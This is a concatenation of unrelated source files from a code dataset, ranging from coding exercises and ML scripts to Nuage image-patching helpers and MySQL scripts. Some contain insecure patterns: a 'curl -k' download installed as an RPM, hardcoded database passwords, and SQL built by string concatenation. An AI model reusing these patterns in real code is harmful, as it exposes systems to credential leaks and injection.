The combination types are shown below, for an anchor\ncolour of _green_ :\n\n![Image of Colour Combinations](https://edabit-\nchallenges.s3.amazonaws.com/colour_harmony.png)\n\nGiven an anchor colour and a combination type, write a function that returns a\n_set_ containing all colours within the combination.\n\n### Examples\n\n colour_harmony(\"green\", \"triadic\") ➞ { \"green\", \"violet\", \"orange\" }\n \n colour_harmony(\"blue-green\", \"complementary\") ➞ { \"blue-green\", \"red-orange\" }\n \n colour_harmony(\"orange\", \"analogous\") ➞ { \"yellow-orange\", \"red-orange\", \"orange\" }\n\n### Notes\n\n * Create the combinations given their relative positions from the anchor colour. For example, the rectangle combination starts with the colours two positions clockwise and four positions anti-clockwise from the anchor (and not the other way around). With the split-complemetary combination, you take the colours five positions both clockwise and anti-clockwise from the anchor. For the analogous combination, you include the colours directly on either side of the anchor.\n * Include the anchor colour in the final set.\n\n\"\"\"\r\n\ndef colour_harmony(anchor,scheme):\n final = []\n colours = [\"red\", \"red-orange\", \"orange\", \"yellow-orange\", \"yellow\", \"yellow-green\", \"green\", \"blue-green\", \"blue\", \"blue-violet\", \"violet\", \"red-violet\"]\n dictionary = {\"complementary\": [0,6],\n \"analogous\": [-1,0,1],\n \"triadic\": [4,0,-4],\n \"split_complementary\": [5,0,-5],\n \"rectangle\": [2,6,8,0],\n \"square\": [0,3,6,9]\n }\n \n loop = dictionary[scheme]\n \n for item in loop:\n \n anchor_position = colours.index(anchor)\n \n if item == 0:\n final.append(colours[anchor_position])\n \n if item != 0:\n to_append = anchor_position + item\n if to_append > 11:\n final_append = to_append - 12\n final.append(colours[final_append])\n if to_append < 0:\n final_append = 12 + to_append\n final.append(colours[final_append])\n \n if to_append >= 0 and to_append <= 11:\n final.append(colours[to_append])\n return set(final)\n\n","sub_path":"md4AF8HwJrhrhA5zm_16.py","file_name":"md4AF8HwJrhrhA5zm_16.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"294182734","text":"import os\nimport sys\nimport argparse\nimport random\nimport numpy as np\nimport pandas as pd\nimport feature_extraction as fe\nfrom sklearn.model_selection import train_test_split\n\n# W:anger, L:boredom, E:disgust, A:fear, F:happiness, T:sadness, N:neutral\nemo_label_ber = {'W': 0, 'L': 1, 'E': 2, 'A': 3, 'F': 4, 'T': 5, 'N': 6}\ngender_label = {'03': 0, '08': 1, '09': 1, '10': 0, '11': 0, '12': 0, '13': 1, '14': 1, '15': 0, '16': 1}\noutput_path = '../db'\n\ndef csv_dataset(dataset, output, pick=(0, 0, 0, 1, 1), \n win_ms=0.025, overlap=0.015, mode=0, preemp=0.97):\n dbpath = ''\n if dataset == 'Berlin':\n dbpath = '../db/berdb/'\n else:\n dbpath = '../db/ravdb_normal/'\n files = os.listdir(dbpath)\n labels = fe.allLabels(pick = pick)\n file_name = []\n emo_labels = []\n gen_labels = []\n result = []\n for fn in range(len(files)):\n frames = fe.Signal(dbpath + files[fn], win_ms, overlap, mode, preemp)\n features = frames.pickFeatures(pick)\n result.append(features)\n if dataset == 'Berlin':\n emo_labels.append(emo_label_ber[filter(lambda x: x.isupper(), files[fn])])\n gen_labels.append(gender_label[files[fn][:2]])\n else:\n emo_labels.append(int(files[fn].split('.')[0].split('-')[2]))\n gen_labels.append(0 if 
int(files[fn].split('.')[0].split('-')[-1]) & 1 else 1)\n        file_name.append(files[fn])\n    \n    result = np.asarray(result)\n    result = pd.DataFrame(result, columns = labels)\n    result['emotion'] = emo_labels\n    result['gender'] = gen_labels\n    result['file'] = file_name\n\n    result.to_csv(output, sep = ',', encoding = 'utf-8') \n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-d', '--dataset', required=True, help='input dataset (Berlin or RAV)')\n    parser.add_argument('-o', '--output', required=True, help='output file')\n    parser.add_argument('-f', '--features', help='feature selection')\n    args = vars(parser.parse_args())\n    dataset = str(args['dataset'])\n    if dataset not in ('Berlin', 'RAV'):\n        raise Exception('Wrong dataset! Please input Berlin or RAV!')\n    output_name = str(args['output'])\n    pick = (0, 0, 0, 1, 1)\n    if args['features'] is not None:\n        pick = tuple([int(i) for i in list(args['features'])])\n    csv_dataset(dataset, os.path.join(output_path, output_name + '.csv'), pick) \n\n","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"601027133","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.exceptions import CloseSpider\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport csv\nfrom selenium.webdriver.support.ui import Select\nfrom .. import settings\nfrom selenium.common.exceptions import NoSuchElementException\nfrom scrapy.http import Request\nfrom scrapy.selector import HtmlXPathSelector\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom pathlib import Path\nfrom datetime import datetime\n\n \nclass ScraperSpider(CrawlSpider):\n    name = 'scraper'\n    allowed_domains = ['www.greatplacetowork.com']\n    search_url = 'https://www.greatplacetowork.com/forallsummit/speakers'\n    start_urls = ['https://www.greatplacetowork.com/forallsummit/speakers']\n    short_sleep=4\n    medium_sleep=5\n    long_sleep=10\n\n\n    def parse(self, response):\n        url = \"https://www.greatplacetowork.com/forallsummit/speakers\"\n        chromedriver_path=\"C:/chromedriver\"\n        chrome_options = webdriver.ChromeOptions()\n        partial_url=\"213129/agenda/speakers/\"\n\n        current_directory=str(Path(__file__).parent.parent.absolute())\n        csv_dir=current_directory+\"/data/\"\n        Path(csv_dir).mkdir(parents=True,exist_ok=True)\n        #prefs = {\"download.default_directory\": path }\n        #chrome_options.add_experimental_option('prefs',prefs)\n        #chrome_options.add_argument('--headless')\n        #chrome_options.add_argument('window-size=1024x768')\n        #chrome_options.add_argument(\"disable-gpu\")\n        #chrome_options.add_argument('--no-sandbox')\n        #chrome_options.add_argument('--disable-dev-shm-usage')\n        chrome_options.add_argument(\"--start-maximized\")\n        #print(current_directory)\n\n        #exec(open(current_directory+ '/'+'pdf_extraction.py').read())\n\n\n\n\n\n        browser = webdriver.Chrome(chromedriver_path,chrome_options=chrome_options)\n        \n        browser.get(url)\n        browser.get_cookies()\n        sleep(self.medium_sleep)\n        \n        iframe=browser.find_element_by_tag_name('iframe')\n        src_iframe=iframe.get_attribute(\"src\")\n        browser.get(src_iframe)\n        browser.get_cookies()\n        \n        sleep(self.short_sleep)\n        anchors=browser.find_elements_by_tag_name('a')\n        list_urls=[]\n        for url in anchors:\n            href=url.get_attribute('href')\n            if(href):\n                
list_urls.append(href)\n\n\n asserts_urls=[]\n for url in list_urls:\n if partial_url in url:\n asserts_urls.append(url)\n\n with open( csv_dir +\"data\"+\".csv\", \"w\") as csvFile:\n csv_output = csv.writer(csvFile)\n csv_output.writerow([\"URLS with pattern {}\".format(partial_url)])\n for url in asserts_urls:\n csv_output.writerow([url])\n browser.close()\n\n\n\n\n\n\n \n\n\n","sub_path":"webScrapy/webScrapy/spiders/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"68727274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 1 16:23:31 2019\n\n@author: zhouqiu\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom reader1D import Reader\n\nX_reader = Reader('train_noise4.txt', message_size=91,\n batch_size=1, sample_num=500, name='X')\nY_reader = Reader('train_smooth.txt', message_size=91,\n batch_size=1, sample_num=500, name='Y')\ntest_X_reader = Reader('test_noise4.txt', message_size=91,\n batch_size=1, sample_num=50, name='Y')\nX_array = X_reader.getData()/15\nY_array = Y_reader.getData()/15\ntest_X_array = test_X_reader.getData()/15\n#print(X_array.shape)\n\nmodel = keras.Sequential([\n #keras.layers.Flatten(input_shape=(91)),\n #keras.layers.Input(shape=(91,)),\n keras.layers.Dense(128, activation=tf.nn.relu),\n # keras.layers.Conv1D(filters=32, kernel_size=4, strides=2, padding='VALID'),\n # keras.layers.Conv1D(filters=64, kernel_size=7, strides=2, padding='VALID'),\n # keras.layers.Dense(128, input_shape=(91,), activation=tf.nn.relu),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(128, activation=tf.nn.relu),\n # keras.layers.UpSampling1D(size=2),\n # keras.layers.UpSampling1D(size=2),\n keras.layers.Dense(91, activation=tf.nn.relu)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(), \n loss=tf.keras.losses.MeanSquaredError(),\n metrics=['mse'])\n\nmodel.fit(X_array, Y_array, epochs=50)\nprint(X_array.shape)\noutput_array = model.predict(test_X_array)\nprint(output_array.shape)\n\nf = open('output_array_Dense_relu.txt', 'w') # 清空文件内容再写\nfor i in range(output_array.shape[0]):\n for j in range(output_array.shape[1]):\n f.write(str(output_array[i][j]*15))\n f.write(' ')\n f.write('\\n')\n# f.write('aaa') #只能写字符串\n# f.write('\\n')\n# f.writelines(['123','\\n', 'bbb','\\n']) #可写所有能迭代的类型,例如list\n# f.writelines(('456','\\n', 'ccc')) #例如tuple\nf.close()","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"127136870","text":"from django.shortcuts import render\nfrom django.utils import translation\nfrom django.contrib.auth.decorators import login_required\nfrom apps.company_user.models import CompanyUser\n\n\n@login_required\ndef home(request):\n data = {}\n data['usuario'] = request.user\n return render(request, 'core/index.html', data)\n\n\n@login_required\ndef home_en(request):\n data = {}\n data['usuario'] = request.user\n translation.activate(\"en\")\n return render(request, 'core/index.html', data)\n\n\n@login_required\ndef home_pt(request):\n data = {}\n data['usuario'] = request.user\n translation.activate(\"pt\")\n return render(request, 'core/index.html', 
data)\n","sub_path":"apps/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"319354035","text":"import pygame\nfrom pygame.sprite import Group\n\nimport game_functions as gf\nfrom corgi import Corgi\nfrom game_stats import GameStats\nfrom scoreboard import Scoreboard\nfrom button import Button\nfrom logo import Logo\nfrom settings import Settings\n\n\ndef run_game():\n \"\"\"Run the game\n ...\n This function starts the game. It initializes pygame, instantiates the\n screen, play button, stats, scoreboard, corgi, borks, kitties and an army\n thereof. It then starts the main loop which updates the screen and checks\n for events. When the game is active, it also updates the corgi, the borks\n and the kitties.\"\"\"\n pygame.init()\n settings = Settings()\n\n screen = pygame.display.set_mode(\n (settings.screen_width, settings.screen_height))\n pygame.display.set_caption(settings.caption)\n\n logo = Logo(settings, screen)\n play_button = Button(screen, settings, settings.play_button_text)\n stats = GameStats(settings)\n scoreboard = Scoreboard(settings, screen, stats)\n corgi = Corgi(settings, screen)\n borks = Group()\n kitties = Group()\n\n gf.create_army(settings, screen, corgi, kitties)\n\n # game loop\n while True:\n gf.update_screen(settings, screen, stats,\n scoreboard, corgi, kitties, borks, play_button, logo)\n gf.check_events(settings, screen, stats,\n scoreboard, play_button, kitties, corgi, borks)\n\n if stats.game_active:\n corgi.update()\n gf.update_borks(settings, screen, stats,\n scoreboard, corgi, kitties, borks)\n gf.update_kitties(settings, stats, screen,\n scoreboard, corgi, kitties, borks)\n\n\nrun_game()\n","sub_path":"invaders.py","file_name":"invaders.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"294569448","text":"# !/usr/bin/python\n# Copyright 2019 NOKIA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,\n# either express or implied. 
See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport subprocess\nimport sys\nimport logging\nimport os\nimport constants\n\n\nlogger = logging.getLogger(constants.LOG_FILE_NAME)\n\n\n#####\n# Function to run commands on the console\n#####\n# quotes\ndef cmds_run(cmds):\n if not cmds:\n return\n output_list = []\n for cmd in cmds:\n proc = subprocess.Popen(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=True,\n close_fds=True)\n (out, err) = proc.communicate()\n if err and err.split():\n logger.error(\n \"error occurred during command:\\n %s\\n error:\\n %s \\n \"\n \"exiting\" % (cmd, err))\n sys.exit(1)\n output_list.append(out)\n\n if len(cmds) == 1:\n if output_list[0]:\n logger.debug(\"%s\" % output_list[0])\n return output_list[0]\n else:\n if output_list:\n logger.debug(\"%s\" % output_list)\n return output_list\n\n\ndef virt_customize(command):\n return cmds_run(\n [constants.VIRT_CUSTOMIZE_ENV + 'virt-customize '\n '--run-command %s' %\n command])\n\n\ndef virt_customize_run(command):\n return cmds_run([constants.VIRT_CUSTOMIZE_ENV + 'virt-customize '\n '--run %s' %\n command])\n\n\ndef virt_copy(command):\n return cmds_run([constants.VIRT_CUSTOMIZE_ENV + 'virt-copy-in '\n '-a %s' % command])\n\n\n#####\n# Check if the provided path to the file exists\n#####\n\n\ndef file_exists(filename):\n if os.path.isfile(filename):\n return True\n else:\n logger.error(\"%s is not present in the location of this \"\n \"script\" % filename)\n sys.exit(1)\n\n\n#####\n# Function to add RHEL subscription using guestfish\n#####\n\n\ndef start_script():\n if os.path.isfile(constants.SCRIPT_NAME):\n os.remove(constants.SCRIPT_NAME)\n\n cmds = '''#!/bin/bash\nset -xe\n'''\n write_to_file(constants.SCRIPT_NAME, cmds)\n\n\n#####\n# Function that writes commands to a file\n#####\n\ndef write_to_file(filename, contents):\n with open(filename, 'a') as script:\n script.writelines(contents)\n\n#####\n# Importing Gpgkeys to Overcloud image\n#####\n\n\ndef importing_gpgkeys(image, gpgkeys):\n cmd = '''\n#### Importing GPG keys\n'''\n write_to_file(constants.SCRIPT_NAME, cmd)\n for gpgkey in gpgkeys:\n file_exist = os.path.isfile(gpgkey)\n file_name = os.path.basename(gpgkey)\n if file_exist:\n virt_copy('%s %s %s' % (image, gpgkey,\n constants.TEMPORARY_PATH))\n rpm_import = '''\nrpm --import %s%s\n''' % (constants.TEMPORARY_PATH, file_name)\n write_to_file(constants.SCRIPT_NAME, rpm_import)\n\n else:\n logger.error(\"Nuage package signing key is not present \"\n \"in %s ,\"\n \"Installation cannot proceed. 
Please place \"\n \"the \"\n \"signing key in the correct location and\"\n \" retry\" %\n gpgkey)\n\n sys.exit(1)\n\n\n####\n# Copying repo file to overcloud image\n####\n\n\ndef copy_repo_file(image, repofile):\n if os.path.isfile(repofile):\n virt_copy('%s %s /etc/yum.repos.d/' % (image, repofile))\n else:\n logger.error(\"Repo file doesn't exists at %s\"\n \"Please provide the correct path of RepoFile\" %\n repofile)\n sys.exit(1)\n\n\n#####\n# Function to add RHEL subscription using guestfish\n#####\n\n\ndef rhel_subscription(username, password, pool, satellite_url, satellite_org,\n satellite_key, proxy_hostname, proxy_port,\n rhel_sub_type):\n subscription_command = ''\n if proxy_hostname and proxy_port:\n subscription_command += (\n \"subscription-manager config\"\n \" --server.proxy_hostname=%s \"\n \" --server.proxy_port=%s\\n\"\n % (proxy_hostname, proxy_port)\n )\n # this does not allow multiple runs of the patching script\n if rhel_sub_type == constants.RHEL_SUB_SATELLITE:\n subscription_command += (\n \"hostname nuage-patching\\n\"\n \"sudo curl -k %(0)s/pub/katello-ca-consumer-latest.noarch.rpm -o \"\n \"%(1)skatello-ca-consumer-latest.noarch.rpm\\n\"\n \"sudo rpm -Uvh %(1)skatello-ca-consumer-latest.noarch.rpm\\n\"\n \"rm -rf %(1)skatello-ca-consumer-latest.noarch.rpm\\n\"\n % {'0': satellite_url, '1': constants.TEMPORARY_PATH}\n )\n subscription_command += (\n \"subscription-manager register\"\n \" --org='%s' --activationkey='%s'\\n\" %\n (satellite_org, satellite_key)\n )\n else:\n subscription_command += (\n \"subscription-manager register\"\n \" --username='%s' --password='%s'\\n\" % (username, password)\n )\n subscription_command += (\n \"subscription-manager attach --pool='%s'\\n\" % pool\n )\n subscription_command += (\n \"subscription-manager repos --enable=rhel-7-server-optional-rpms\\n\"\n \"subscription-manager repos --enable=rhel-7-server-rpms\\n\"\n )\n write_to_file(constants.SCRIPT_NAME, subscription_command)\n\n\n#####\n# Function to remove the RHEL subscription\n#####\n\n\ndef rhel_remove_subscription(rhel_sub_type=None):\n cmd = '''\n#### Removing RHEL Subscription\nsubscription-manager unregister\n'''\n if rhel_sub_type == constants.RHEL_SUB_SATELLITE:\n cmd += (\n \"rpm -qa\"\n \"| grep katello-ca-consumer\"\n \"| xargs sudo rpm -e\"\n )\n write_to_file(constants.SCRIPT_NAME, cmd)\n\n#####\n# Function to install packages nuage python ovs\n#####\n\n\ndef install_nuage_python_ovs_packages():\n cmd = '''\n#### Install Nuage Python OpenvSwitch\nyum install --setopt=skip_missing_names_on_install=False -y %s\nyum clean all\n''' % constants.NUAGE_PYTHON_OVS\n write_to_file(constants.SCRIPT_NAME, cmd)\n\n#####\n# Function to remove packages that are not needed\n#####\n\n\ndef uninstall_packages():\n cmd = '''\n#### Removing Upstream OpenvSwitch\novs_package_name=$(rpm -qa | awk -F- \\\n'/^(openvswitch[0-9]+\\.[0-9]+-|openvswitch-2)/{print $1}')\nyum remove -y $ovs_package_name\nyum clean all\n'''\n write_to_file(constants.SCRIPT_NAME, cmd)\n","sub_path":"image-patching/nuage_image_patching_scripts/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"316745834","text":"from collections import Counter\nfrom tqdm import tqdm\nimport pickle\n\n\ndef read_txt_file(file_path):\n with open(file_path, 'r', encoding='utf-8') as f:\n data = f.readlines()\n data = [d[:-1] for d in data]\n return data\n\n\ndef count_dataset(data):\n results = 
Counter()\n for d in tqdm(data):\n results += Counter(d)\n return results\n\n\ndef Convert_word_to_ids(word_list, data):\n result = []\n for l in tqdm(data):\n tmp = [word_list.index('SOS')]\n for w in l:\n if w in word_list:\n tmp.append(word_list.index(w))\n else:\n tmp.append(word_list.index('UNK'))\n tmp.append(word_list.index('EOS'))\n result.append(tmp)\n return result\n\n\ndef Padding_Cutting(data, max_len):\n result = [l[:max_len] for l in data]\n result_len = [len(l) for l in result]\n result = [l+[word_list.index('PAD')]*(max_len-len(l)) if len(l)threshold]\n word_list = ['PAD', 'SOS', 'EOS', 'UNK'] + [x[0] for x in word_list]\n\n result_datas = dict()\n for f_n in file_list:\n print(f_n, 'Convert_word_to_ids')\n data = Convert_word_to_ids(word_list, dataset[f_n])\n data, data_len = Padding_Cutting(data, 28)\n result_datas[f_n] = {'data': data, 'data_len': data_len}\n \n with open('./'+'dataset_%s.pk' % (threshold), 'wb') as f:\n pickle.dump(result_datas, f)\n with open('./'+'word_list_%s.txt' % (threshold), 'w', encoding='utf-8') as f:\n f.writelines([w+'\\n' for w in word_list])\n print(1)\n","sub_path":"YesorNoIdentify/SI_dataset_process/get_wordlist_convert2id.py","file_name":"get_wordlist_convert2id.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"202111839","text":"def pancake_sort(arr):\n og_arr = list(reversed(sorted(arr)))\n arr_len = len(arr) - 1\n flips = []\n i = 0\n for i in range(arr_len):\n if arr == og_arr:\n break\n max_i = arr.index(max(arr[i:]))\n # if max_i != i:\n if max_i != arr_len:\n flips.append(max_i + 1)\n arr[max_i:] = reversed(arr[max_i:])\n flips.append(i + 1)\n arr[i:] = reversed(arr[i:])\n # print(og_arr == arr)\n flips.append(0)\n # print(arr)\n return flips\n\n\nif __name__ == '__main__':\n import sys\n arrays = []\n try:\n for line in sys.stdin:\n arrays.append([int(e) for e in line.split(' ') if e])\n except TypeError as e:\n print(e)\n sys.exit()\n del arrays[-1] # remove the pesky 0 at the end\n for array in arrays:\n print(' '.join((str(e) for e in array)))\n print(' '.join((str(n) for n in pancake_sort(array))))\n print(0)\n","sub_path":"pancake_flip/poor_pancake_sort.py","file_name":"poor_pancake_sort.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"555943600","text":"#!/usr/bin/python\n#you can execute this script with the 'python document.py' command\n#first you want to map the table that you want to write to ('document' by default) then ensure that you uncomment the lines near the bottom to insert the data into the tbale\n\nimport MySQLdb\nimport time\nfrom time import gmtime, strftime\n\ntableName = 'transaction'\n# Open database connection\ndb = MySQLdb.connect(\"127.0.0.1\",\"root\",\"root\",\"latipay\" )\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\ncursor2 = db.cursor()\ncursor.execute(\"SELECT code FROM latipay.merchant_base;\")\n#generate a list of all merchants in the DB\nmerchants = list(cursor.fetchall())\n\napiQuery = \"SELECT order_id, create_date, gateway_type, receive_amount, item_name, payer_merchant_code, merchant_code, id_number, choose_currency FROM latipay.transaction_order WHERE merchant_code=\"\n#get id_number for each merchant_id\nfor merchant_code in merchants:\n merchant_code = merchant_code[0]\n merchant_code = \"'\" + merchant_code + \"'\"\n cursor2.execute(apiQuery + merchant_code 
+';')\n    trans_info = cursor2.fetchone()\n    if trans_info is not None and trans_info[1] != '' and trans_info[1] is not None:\n\n        transaction_id = trans_info[0]\n        amount = trans_info[3]\n        payment_method = trans_info[2]\n        if trans_info[1] is not None and trans_info[1] != '':\n            create_date = time.strftime(\"%Y:%m:%d\")\n        else: create_date = trans_info[1]\n\n        product_type = trans_info[4]\n        payer_id = trans_info[5]\n\n        organisation_id = trans_info[6]\n        user_id = trans_info[7]\n        currency = trans_info[8]\n        type = 'api'\n\n\n        # insert1 = \"INSERT INTO\" + tableName + \"(transaction_id, amount, payment_method, create_date, product_type, payer_id, organisation_id, user_id, currency, type) VALUES (\"\n        # insert2 = transaction_id + ',' + amount + ',' + payment_method + ',' + create_date + ',' + product_type + ',' + payer_id + ',' + organisation_id + ',' + user_id + ',' + currency + ',' + type\");\"\n        # insertQuery = insert1 + insert2\n        # insertCursor = db.cursor()\n        # insertCursor.execute(insertQuery)\n        # db.commit()\n\nprint ('success!')\n\n# disconnect from server\ndb.close()\n","sub_path":"migrationScripts/transaction_api.py","file_name":"transaction_api.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59529774","text":"'''Parameterizing SQL statements'''\nimport pymysql\n\ndb = pymysql.connect(host=\"localhost\",\n                     user=\"root\",\n                     password=\"123456\",\n                     database=\"db5\",\n                     charset=\"utf8\",\n                     port=3306)\ncur = db.cursor()\n# Read user input from the terminal\nsid = input(\"Please enter an ID: \")\nsname = input(\"Please enter a name: \")\nsscore = input(\"Please enter a score: \")\n# Define the SQL command as a variable\n# Using '%s' placeholders filled in with the % operator is not recommended\n# ins = \"insert into t1 values('%s','%s','%s')\" % (sid,sname,sscore)\nins = 'insert into t1 values(%s,%s,%s)'\nL = [sid,sname,sscore]\ntry:\n    # Parameters must be passed as a list, the 2nd argument of execute\n    cur.execute(ins,L)\n    db.commit()\n    print(\"ok\")\nexcept Exception as e:\n    db.rollback()\n    print(\"Failed\",e)\n\ncur.close()\ndb.close()\n","sub_path":"mysql/day05/mysql/04_SQL语句参数化.py","file_name":"04_SQL语句参数化.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"496916180","text":"import pandas as pd\nimport numpy as np\nfrom decim.fmri_workflow import BehavDataframe as fa\nfrom collections import defaultdict\n\n\nclass Choiceframe(object):\n\n    def __init__(self, subject, session, run, flex_dir, BehavFrame, PupilFrame, BrainstemRois):\n        '''\n        Initialize\n        '''\n        self.subject = subject\n        self.session = session\n        self.run = run\n        self.flex_dir = flex_dir\n        BehavFrame.onset = BehavFrame.onset.astype(float)\n        BehavFrame = BehavFrame.sort_values(by='onset')\n        self.BehavFrame = BehavFrame\n        self.PupilFrame = PupilFrame\n        self.BrainstemRois = BrainstemRois\n\n    def choice_behavior(self):\n        df = self.BehavFrame\n        switches = pd.DataFrame({'onset': df.loc[df.switch != 0].onset.values,\n                                 'direction': df.loc[df.switch != 0].switch.values,\n                                 'switch_index': df.loc[df.switch != 0].index.values})\n        self.switch_behavior = switches\n\n    def points(self):\n        '''\n        Add belief values of 11 surrounding samples to later find true switches\n        '''\n        df = self.BehavFrame\n        points = df.loc[(df.event == 'GL_TRIAL_LOCATION')].reset_index()\n        p = []\n        for i, row in self.switch_behavior.iterrows():\n            switch_point = points.loc[points['index'] == row.switch_index].index[0]\n            if switch_point < 5:\n                trial_points = points.iloc[0:switch_point + 6]\n                p.append(np.append(np.zeros(11 - len(trial_points)), 
trial_points.belief.values))\n else:\n trial_points = points.iloc[switch_point - 5:switch_point + 6]\n p.append(trial_points.belief.values)\n self.point_kernels = pd.DataFrame(p)\n\n def choice_pupil(self, artifact_threshhold=.2, tw=4500):\n '''\n Takes existing pupilframe and makes choicepupil frame.\n If there is no existing pupilframe, a new one is created.\n '''\n df = self.BehavFrame\n behav_onsets = self.BehavFrame.loc[self.BehavFrame.event ==\n 'CHOICE_TRIAL_ONSET'].onset.values\n pupil_onsets = self.PupilFrame.loc[self.PupilFrame.message ==\n 'CHOICE_TRIAL_ONSET'].time.values\n difference = pupil_onsets / 1000 - behav_onsets\n assert difference.std() < 0.05\n switch_onsets = df.loc[df.switch != 0].onset.values\n switch_onsets_pupil = (switch_onsets + difference.mean()) * 1000\n switch_indices = self.PupilFrame.loc[self.PupilFrame.time.\n isin(switch_onsets_pupil.astype(int))].index\n assert len(switch_indices) == len(switch_onsets)\n df = self.PupilFrame.loc[:, ['message', 'biz', 'message_value',\n 'blink', 'run', 'trial_id']]\n print(df)\n pupil_switch_lock = []\n blink_mean = []\n for switch in switch_indices:\n '''\n Extract gratinglocked pupilresponse, choicelocked pupil response & choice parameters\n '''\n pupil_switch_lock.append(df.loc[np.arange(switch - 1000, switch + tw - 1000).\n astype(int), 'biz'].values)\n blink_mean.append(df.loc[np.arange(switch - 500, switch + 1500), 'blink'].mean())\n pupil_switch_lock = pd.DataFrame(pupil_switch_lock)\n print(pupil_switch_lock)\n baseline = np.matrix((pupil_switch_lock.loc[:, 0:1000].mean(axis=1))).T\n pupil_switch_lock = pd.DataFrame(np.matrix(pupil_switch_lock) - baseline)\n self.pupil_switch_lock = pupil_switch_lock\n self.pupil_parameters = pd.DataFrame({'blink': blink_mean})\n self.pupil_parameters['TPR'] = self.pupil_switch_lock.loc[:, 500:2500].mean(axis=1)\n\n def fmri_epochs(self, basel=2000, te=6):\n roi = self.BrainstemRois\n roi = roi.loc[:, ['aan_dr', 'zaborsky_bf4',\n 'zaborsky_bf123', 'keren_lc_1std', 'NAc', 'SNc',\n 'VTA', '4th_ventricle']]\n dt = pd.to_timedelta(roi.index.values * 1900, unit='ms')\n roi = roi.set_index(dt)\n target = roi.resample('100ms').mean().index\n roi = pd.concat([fa.interp(dt, roi[c], target) for c in roi.columns], axis=1)\n behav = self.switch_behavior\n onsets = behav.onset.values\n evoked_run = defaultdict(list)\n for onset in onsets:\n cue = pd.Timedelta(onset, unit='s').round('ms')\n bl = pd.Timedelta(basel, unit='ms')\n baseline = roi.loc[cue - bl: cue + bl].mean()\n task_evoked = roi.loc[cue - bl: cue + bl * te] - baseline\n for col in task_evoked.columns:\n evoked_run[col].append(task_evoked[col].values)\n for key, values in evoked_run.items():\n df = pd.DataFrame(values)\n evoked_run[key] = df\n self.roi_epochs = evoked_run\n\n def merge(self):\n '''\n Merge everything. 
And Save.\n '''\n self.pupil_switch_lock.columns =\\\n pd.MultiIndex.from_product([['pupil'], ['switch_lock'],\n range(self.pupil_switch_lock.shape[1])],\n names=['source', 'type', 'name'])\n self.pupil_parameters.columns =\\\n pd.MultiIndex.from_product([['pupil'], ['parameters'],\n self.pupil_parameters.columns],\n names=['source', 'type', 'name'])\n self.switch_behavior.columns =\\\n pd.MultiIndex.from_product([['behavior'], ['parameters'],\n self.switch_behavior.columns],\n names=['source', 'type', 'name'])\n self.point_kernels.columns =\\\n pd.MultiIndex.from_product([['behavior'], ['points'],\n range(self.point_kernels.shape[1])],\n names=['source', 'type', 'name'])\n master = pd.concat([self.pupil_switch_lock,\n self.pupil_parameters,\n self.switch_behavior,\n self.point_kernels], axis=1)\n master = master.set_index([master.behavior.parameters.onset])\n singles = []\n for key, frame in self.roi_epochs.items():\n frame.columns = pd.MultiIndex.from_product([['fmri'], [key],\n frame.columns],\n names=['source', 'type', 'name'])\n singles.append(frame)\n fmri = pd.concat(singles, axis=1)\n self.master = pd.merge(fmri.set_index(master.index, drop=True).reset_index(),\n master.reset_index())\n\n\ndef execute(subject, session, run, task, flex_dir,\n BehavFrame, PupilFrame, BrainstemRois):\n c = Choiceframe(subject, session, run, flex_dir,\n BehavFrame, PupilFrame, BrainstemRois)\n c.choice_behavior()\n if task == 'inference':\n c.points()\n elif task == 'instructed':\n c.point_kernels = pd.DataFrame(np.zeros((c.switch_behavior.shape[0], 11)))\n c.choice_pupil()\n c.fmri_epochs()\n c.merge()\n return c.master\n\n\n'''\nbehav = 